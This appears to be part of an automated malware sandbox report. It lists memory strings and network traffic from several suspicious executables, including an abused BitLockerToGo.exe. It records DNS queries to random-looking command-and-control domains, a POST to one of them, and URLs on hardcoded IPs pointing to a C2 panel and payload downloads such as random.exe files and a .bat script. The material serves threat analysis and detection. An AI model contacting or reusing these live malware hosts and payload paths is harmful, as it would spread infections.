Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"user": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000022.00000002.3046778370.0000020F09875000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: exarthynature.run
Source: global traffic	DNS traffic detected: DNS query: decreaserid.world
Source: global traffic	DNS traffic detected: DNS query: uncertainyelemz.bet
Source: global traffic	DNS traffic detected: DNS query: hobbyedsmoker.live
Source: global traffic	DNS traffic detected: DNS query: dsfljsdfjewf.info
Source: global traffic	DNS traffic detected: DNS query: deaddereaste.today
Source: global traffic	DNS traffic detected: DNS query: subawhipnator.life
Source: global traffic	DNS traffic detected: DNS query: privileggoe.live
Source: global traffic	DNS traffic detected: DNS query: pastedeputten.life
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: techpxioneers.run
Source: global traffic	DNS traffic detected: DNS query: dawtastream.bet
Source: global traffic	DNS traffic detected: DNS query: circujitstorm.bet
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: exarthynature.run

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:26:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCF-RAY: 9199ac60da7242c0-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:26:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEMQgZmXaQ6PyZupufZKgHG%2Fsu5PBhJzawKa0EcdHvFiFQ9mMzjPH4CBfM4UW18nAS26t1N%2BmKVPRuu07g1nm76IGSo3sAdFhbwG%2B9rJvJiU0XfEuUBg7fOuZ8Iu0hVOWAHoGg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199ac657da14363-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:26:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hrlub4vFB7iaFlLx%2FqvOPsL1AmHLc8Fkq80OGBcnNfoNPihyyBoZpUhea2t5mQN5H%2F%2B0T1shVZYSHLdN%2FjlQAsBkS4%2BeeNRfmjefbCJrE0tp38a7y3a5rONLyzUi%2Bc%2Bs2PDvdA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199ac6a6e91614b-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:26:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m586Ecm3SU5ZobyXDDtUH0Dx0OlBFbsllicuh031ua%2BSLjpGDTTddM%2F7temHyvMBoC3sjHRT1%2BRUzPcQiXsjIz8aKMifhDaRuq2mJpuM4VdCOzoWetg7eRpNXk1WOo6%2BziPxLA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199ac6f39dbde9a-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:26:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2oeX%2BUt2%2F%2FfeO11l942%2FAr9%2BEiUHTl9Ztnn0a9PcSNJXkTwsJqyrrOR0k7XJ%2BnO0KbzUoJHwGHhweRkaOLRpdK4QFmQO6nBeXpkn%2Ff2sTCh6N080wxT1pml0FCk9bVbr2s%2FV%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199ac732d9c25dc-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:26:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O%2Bsr8cBv2VMOH0JgvdG6Gm6SYSs1mvLIrgzT6PQBRzDHE7pqe7R4mpyIgjnVUHlKtAgfRqUAT%2BNhvAASFSkqA6pygGGLIRJQEBRIe%2FPNfQypjkPvNfdfzrPRhICdDx5pGwg8tA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199ac9df8331885-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:26:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q4g%2Bs%2FU9WU1q95AFskUe7TF36A07vhh3r7Mv%2BgAIJ3p9Jc3v3yiMdWQM1%2Fw9%2FmG0vbqeeEkL%2F7VKb6oH%2BpSLHRDOFNRJLAyorTaWas2dSD7LWOcdG5UV2Fe2RTudxzRiNNo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199acbfb9d58c1d-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:27:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bii3YwLAduMS8qqC89WPBM9RdBtF9AQl5ov7k1haj90SRGM%2BtRcyM3JJMZ2mh6jtgFizxvQ%2FmF0dwzZUKrP6MP60KX3VM%2BIf0fDAHCf0INRwbc2%2F9ry0t3OPbK4%2FFrFgPGI7hw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199ad6b68b15e60-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:27:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FwB4zki2Sew6yFm6XbGajhERic8apaNjY8NXggkir9xelv9j1%2FQTpDQLDdrS6jMgKt1rCOHVR%2FCJSLX8pPscftNxac80Zgk%2Bf%2BKQY7hNNPmnRdL9J%2FkYXxrEWhY7dfJDfSPFxg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199adb7abb142f5-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:28:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ob65fjkt1dbSuesIBsYd5zJo1lNaHz7Ps8iO11XWbUxcAyqXAIJvpdSlNxDeK2CreUGsql9WIUcJYeYSYFW%2FjpfZRetXGy1P%2Fu1iMZvWRCruhSNrc5ZwDEoFIkETDrzN4wHReQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199aeea18b20f95-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:28:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCF-RAY: 9199afe2f864614b-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:28:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Od3e5%2FdReL76uAP8LysFPEYNN4cFZgRJLcEKbzgs0LKRI%2BBhXhGt2ZHWlylEeleFB6c8bCpjThEfZbd6n5TdVB8Kz3FMY1lEEN1%2F7uDsUl3Y3ym4AYHZ0s1LEBWJy0Usalz%2BTg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199afe6bf7b25dc-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:28:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tR1HLYeiQuP%2FqSoacU1ZSO55X4Lc5h1dOLcp9qMZc%2F7eBxWuOGGUR3PWINk%2Bk9lNnVy52ITIc8acKa%2FK0NER6WAGnxxAgk7CkafmEQAw1UtP6g2d%2B2n9U4mk9%2FB39E8XURz8LA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199afedf85f42c0-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:28:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QA1r7CePh%2FB848H832Nbd55RaYqAxIEBRNH5mPCS6%2BcElzWM9BzdXh1w%2FsEFrPHRzrk2sHbRRcXdYyQEzf3lqiZoQapGEn78urwS8D%2FmIJy5TyIhNEakTeTgo9iCtd4Upr1CQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199aff2f9c725dc-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:28:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U8raDLULw6NQdSFJVp0HtZrPTc3ZYClgJTb91EUD3ZJ%2BbqxvKPMg6SiEVbQEOKfKPabMi6UxywWYcqtzaR49MODj9%2F4UvMgcrVaasBtrEv6hksuOZMbtgSNcSWvvsCtFhWFGYQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199aff6cfed4363-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:29:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tSHd0eYabD9lXiLxijz2RRK9lnmCZYs5Mn4BpBXdMFvEQiQBEBrgPxRzViPwrm8MyMTOldXJM8amUS%2BjyKdR6siOBoNHC5hw7OsxwVlNhgJWvRbVnctpsI%2Bj9k0rwIfXTybDuQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199b0bca8e87d00-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 15:29:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ti0eRSozLn06dloA7Qf6gjAc5lRl2E0ymxjLcoGXR96rw5vtVSgTGF1PsstKG7TLYVYtYqps9gsiSjgfgogJS5D9rJGp87TipkyZ%2F3PT%2ByIk7BPidaGulMktaERCmy9pIQg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9199b0d2dc2a8cd7-EWR

Source: firefox.exe, 00000022.00000002.3090183170.0000020F7786B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/&
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000002.00000003.4220728564.0000000000E53000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000002.00000002.4582649780.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000002.00000002.4590739619.00000000034CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php5
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpT
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php_
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpdy1mb3JtLXVybGVuY29kZWQ=ex.php
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpf
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phps
Source: rapes.exe, 00000002.00000002.4582649780.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpt
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/user
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/l
Source: 186adf2617.exe, 00000011.00000002.2959377084.000000000104D000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2886284597.0000000001045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/
Source: 186adf2617.exe, 00000011.00000002.2959377084.000000000104D000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2886284597.0000000001045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/3
Source: 186adf2617.exe, 00000011.00000002.2959377084.000000000104D000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2886284597.0000000001045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/C
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000002.00000003.4220728564.0000000000E62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/bonus_max/random.exe
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/bonus_max/random.exe12
Source: rapes.exe, 00000002.00000002.4582649780.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/fate/random.exe
Source: rapes.exe, 00000002.00000002.4582649780.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/fate/random.exep
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/martin2/random.exe
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/martin2/random.exen2
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/qqdoup/random.exe83
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/qqdoup/random.exeH2
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/unique2/random.exe
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/luma/random.exe
Source: 186adf2617.exe, 00000011.00000002.2959377084.000000000104D000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2886284597.0000000001045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exe
Source: 186adf2617.exe, 00000011.00000002.2959377084.000000000104D000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2886284597.0000000001045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exe6
Source: 186adf2617.exe, 00000011.00000002.2959377084.000000000104D000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2886284597.0000000001045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exer
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/off/random.exe_
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/off/random.exec
Source: 186adf2617.exe, 00000011.00000002.2959377084.000000000104D000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2886284597.0000000001045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/s
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/steam/random.exe
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/steam/random.exef
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/test/am_no.bat
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/test/am_no.batK
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/test/exe/random.exe
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/test/exe/random.exe%
Source: rapes.exe, 00000002.00000002.4582649780.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000002.00000002.4582649780.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/well/random.exe
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2775335983.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2751319207.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/
Source: BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/-
Source: BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/2
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2775335983.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2751319207.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/D
